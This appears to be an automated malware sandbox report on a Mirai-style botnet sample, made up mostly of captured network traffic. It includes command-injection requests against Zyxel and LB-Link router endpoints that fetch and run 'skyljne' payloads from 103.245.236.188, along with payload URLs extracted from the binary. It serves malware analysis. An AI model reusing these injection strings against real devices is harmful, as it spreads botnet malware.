            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=15724800; includeSubDomainsContent-Type: text/html; charset=utf-8Data Raw: Data Ascii:
            Source: skyljne.arm7-20240113-1800.elfString found in binary or memory: http://103.245.236.188/skyljne.mips;$
            Source: skyljne.arm7-20240113-1800.elfString found in binary or memory: http://103.245.236.188/skyljne.mpsl;
            Source: skyljne.arm7-20240113-1800.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: skyljne.arm7-20240113-1800.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
